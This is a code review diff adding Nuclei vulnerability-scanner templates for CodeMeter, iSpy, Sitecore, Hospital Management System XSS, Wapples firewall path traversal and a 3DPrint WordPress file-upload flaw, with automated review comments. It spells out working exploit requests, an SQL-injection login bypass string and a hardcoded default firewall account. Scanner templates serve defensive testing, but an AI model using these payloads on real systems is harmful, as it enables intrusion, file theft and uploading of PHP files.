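Review bot: the `Authorization` header at line 29 uses the `Bearer` scheme, but `cHJpbWFuYTpwcmltYW5h` is base64 of `primana:primana`, a `user:password` pair in HTTP Basic format; it should be `Authorization: Basic cHJpbWFuYTpwcmltYW5h`. A camera that checks the scheme rejects the request and the status-204 matcher never fires. Also, `tags` at line 21 include `telnet` while the check is purely HTTP; drop it unless the description explains that the HTTP account is what enables the telnet backdoor.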
    config/nuclei-templates/misconfiguration/codemeter-webadmin.yaml
     1 +id: codemeter-webadmin
     2 + 
     3 +info:
     4 + name: CodeMeter Webadmin Dashboard
     5 + author: DhiyaneshDk
     6 + severity: low
     7 + metadata:
     8 + verified: true
     9 + shodan-query: html:"CodeMeter"
     10 + tags: misconfig,exposure,codemeter
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - '{{BaseURL}}/index.html'
     16 + 
     17 + matchers-condition: and
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - 'WebAdmin | Dashboard'
     23 + - 'CodeMeter'
     24 + condition: and
     25 + 
     26 + - type: word
     27 + part: header
     28 + words:
     29 + - text/html
     30 + 
     31 + - type: status
     32 + status:
     33 + - 200
     34 + 
    config/nuclei-templates/technologies/ispyconnect-detect.yaml
     1 +id: ispyconnect-detect
     2 + 
     3 +info:
     4 + name: iSpyConnect - Detect
     5 + author: arafatansari
     6 + severity: info
     7 + metadata:
     8 + verified: true
     9 + shodan-query: http.html:"iSpy"
     10 + tags: tech,ispy
     11 + 
     12 +requests:
     13 + - method: GET
     14 + path:
     15 + - '{{BaseURL}}'
     16 + 
     17 + matchers-condition: or
     18 + matchers:
     19 + - type: word
     20 + part: body
     21 + words:
     22 + - 'iSpy is running'
     23 + 
     24 + - type: word
     25 + part: header
     26 + words:
     27 + - 'Server: iSpy'
     28 + 
    config/nuclei-templates/technologies/sitecore-version.yaml
    skipped 29 lines
    30 30   regex:
    31 31   - "<major>([0-9]+)</major>"
    32 32   
     33 + - type: regex
     34 + group: 1
     35 + regex:
     36 + - "<minor>([0-9]+)</minor>"
     37 + 
     38 + - type: regex
     39 + group: 1
     40 + regex:
     41 + - "<build>([0-9]+)</build>"
     42 + 
     43 + - type: regex
     44 + group: 1
     45 + regex:
     46 + - "<revision>([0-9]+)</revision>"
     47 + 
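Review bot: the three added extractors (lines 33-46) each emit one bare number with no `name`, so the output is four integers whose meaning depends on extractor ordering; give each a `name:` (`major`, `minor`, `build`, `revision`) so the version can be reassembled unambiguously, or use one regex spanning `<major>` to `</revision>` without `group` so the whole version block is emitted as a single string.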
    config/nuclei-templates/vulnerabilities/other/hospital-management-xss.yaml
     1 +id: hospital-management-xss
     2 + 
     3 +info:
     4 + name: Hospital Management System v1.0 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in doctor/search.php.
     9 + metadata:
     10 + verified: true
     11 + shodan-query: http.html:"Hospital Management System"
     12 + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
     13 + tags: hms,hospital,cms,xss,authenticated
     14 + 
     15 +requests:
     16 + - raw:
     17 + - |
     18 + POST /hms/doctor/ HTTP/1.1
     19 + Host: {{Hostname}}
     20 + Content-Type: application/x-www-form-urlencoded
     21 + 
     22 + username={{username}}password={{password}}&submit=
     23 + 
     24 + - |
     25 + POST /hms/doctor/search.php HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded
     28 + 
     29 + searchdata=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&search=
     30 + 
     31 + req-condition: true
     32 + cookie-reuse: true
     33 + matchers:
     34 + - type: dsl
     35 + dsl:
     36 + - 'contains(all_headers_2, "text/html")'
     37 + - "status_code_2 == 200"
     38 + - contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
     39 + condition: and
     40 + 
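Review bot: line 22 is missing the `&` between the two fields: `username={{username}}password={{password}}&submit=` sends a single `username` value of `<user>password=<pass>`, so the login never succeeds and the second request (`search.php`) runs unauthenticated. It should read `username={{username}}&password={{password}}&submit=` (the xss2 template has it right). `{{username}}` and `{{password}}` are also never defined: there is no `payloads:` block, unlike `wapples-firewall-lfi`, so the template only works when both are supplied with `-var`; either add a `payloads:` section or document the required variables in the description. The `comment:` at line 12 says `admin'+or+'1'%3D'1'` bypasses the login; if that is the intended default, put it in `payloads:` rather than in a comment.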
    config/nuclei-templates/vulnerabilities/other/hospital-management-xss2.yaml
     1 +id: hospital-management-xss2
     2 + 
     3 +info:
     4 + name: Hospital Management System v1.0 - Cross Site Scripting
     5 + author: arafatansari
     6 + severity: medium
     7 + description: |
     8 + Hospital Management System v1.0 was discovered to contain a XSS vulnerability via the searchdata parameter in patient-search.php.
     9 + metadata:
     10 + verified: true
     11 + shodan-query: http.html:"Hospital Management System"
     12 + comment: Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.
     13 + tags: hms,hospital,cms,xss,authenticated
     14 + 
     15 +requests:
     16 + - raw:
     17 + - |
     18 + POST /hms/admin/ HTTP/1.1
     19 + Host: {{Hostname}}
     20 + Content-Type: application/x-www-form-urlencoded
     21 + 
     22 + username={{username}}&password={{password}}&submit=
     23 + 
     24 + - |
     25 + POST /hms/admin/patient-search.php HTTP/1.1
     26 + Host: {{Hostname}}
     27 + Content-Type: application/x-www-form-urlencoded
     28 + 
     29 + searchdata=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&search=
     30 + 
     31 + req-condition: true
     32 + cookie-reuse: true
     33 + matchers:
     34 + - type: dsl
     35 + dsl:
     36 + - 'contains(all_headers_2, "text/html")'
     37 + - "status_code_2 == 200"
     38 + - contains(body_2, 'Result against \"<script>alert(document.domain)</script>\" keyword')
     39 + condition: and
     40 + 
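Review bot: `{{username}}` and `{{password}}` at line 22 are undefined in this template (no `payloads:` block), same fix as for hospital-management-xss: add a `payloads:` section or document that both must be passed with `-var`. The `comment:` at line 12 again describes a login bypass payload; if it is what the template is expected to run with, make it the payload instead of a comment, and drop the `authenticated` tag, since no real credentials would then be needed.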
    config/nuclei-templates/vulnerabilities/other/wapples-firewall-lfi.yaml
     1 +id: wapples-firewall-lfi
     2 + 
     3 +info:
     4 + name: Wapples Web Application Firewall - Arbitrary File Download
     5 + author: For3stCo1d
     6 + severity: high
     7 + reference:
     8 + - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb
     9 + metadata:
     10 + verified: true
     11 + shodan-query: http.title:"Intelligent WAPPLES"
     12 + tags: wapples,firewall,lfi,authenticated
     13 + 
     14 +requests:
     15 + - raw:
     16 + - |
     17 + POST /webapi/auth HTTP/1.1
     18 + Host: {{Hostname}}
     19 + Content-Type: application/x-www-form-urlencoded
     20 + 
     21 + id={{username}}&password={{password}}
     22 + 
     23 + - |
     24 + GET /webapi/file/transfer?name=/../../../../../../../../etc/passwd&type=db_backup HTTP/1.1
     25 + Host: {{Hostname}}
     26 + Content-Type: application/x-www-form-urlencoded
     27 + 
     28 + attack: pitchfork
     29 + payloads:
     30 + username:
     31 + - systemi
     32 + password:
     33 + - db/wp.no1
     34 + 
     35 + cookie-reuse: true
     36 + matchers:
     37 + - type: regex
     38 + regex:
     39 + - "root:[x*]:0:0"
     40 + 
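Review bot: the second raw request (lines 24-26) is a GET with a `Content-Type: application/x-www-form-urlencoded` header and no body; drop the header. The `authenticated` tag (line 12) is misleading when the template itself supplies the hardcoded `systemi` / `db/wp.no1` account (lines 30-33): from the operator's point of view this is unauthenticated, and it chains CVE-2022-35413 to an arbitrary file read, so reference that CVE in `info` and tag it `default-login` like the sibling template. `matchers-condition` is absent, which is fine with a single matcher.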
    config/nuclei-templates/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml
     1 +id: 3dprint-arbitrary-file-upload
     2 + 
     3 +info:
     4 + name: 3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload
     5 + author: SecTheBit
     6 + severity: high
     7 + description: |
     8 + The p3dlite_handle_upload AJAX action of the plugin does not have any authorisation and does not check the uploaded file, allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
     9 + reference:
     10 + - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282
     11 + - https://www.exploit-db.com/exploits/50321
     12 + metadata:
     13 + verified: true
     14 + tags: wpscan,edb,wordpress,wp,wp-plugin,fileupload,intrusive,3dprint
     15 + 
     16 +requests:
     17 + - raw:
     18 + - |
     19 + POST /wp-admin/admin-ajax.php HTTP/1.1
     20 + Host: {{Hostname}}
     21 + Accept-Encoding: gzip, deflate
     22 + Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
     23 + 
     24 + -----------------------------54331109111293931601238262353
     25 + Content-Disposition: form-data; name="action"
     26 + 
     27 + p3dlite_handle_upload
     28 + -----------------------------54331109111293931601238262353
     29 + Content-Disposition: form-data; name="file"; filename={{randstr}}.php
     30 + Content-Type: text/php
     31 + 
     32 + <?php echo '3DPrint-arbitrary-file-upload'; ?>
     33 + -----------------------------54331109111293931601238262353--
     34 + 
     35 + - |
     36 + GET /wp-content/uploads/p3d/{{randstr}}.php HTTP/1.1
     37 + Host: {{Hostname}}
     38 + 
     39 + req-condition: true
     40 + matchers:
     41 + - type: dsl
     42 + dsl:
     43 + - 'contains(all_headers_2, "text/html")'
     44 + - "status_code_2 == 200"
     45 + - "contains(body_2, '3DPrint-arbitrary-file-upload')"
     46 + condition: and
     47 + 
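Review bot: the template uploads a real `.php` file (lines 29-32) and never removes it, so every run that gets past the upload handler leaves a web-reachable artifact in `wp-content/uploads/p3d/`; `intrusive` in the tags is right, and the description should state that the file is left behind. Because the description at line 8 itself says a `.htaccess` blocks execution on Apache, the DSL matcher on `body_2` / `status_code_2` (lines 42-46) reports nothing on exactly the hosts where the upload still succeeds; add an alternative condition on the first response (the upload handler's reply) so a successful upload is reported even when the GET at line 36 returns 403, and mark that alternative as "upload succeeded, execution not confirmed" in the matcher `name`.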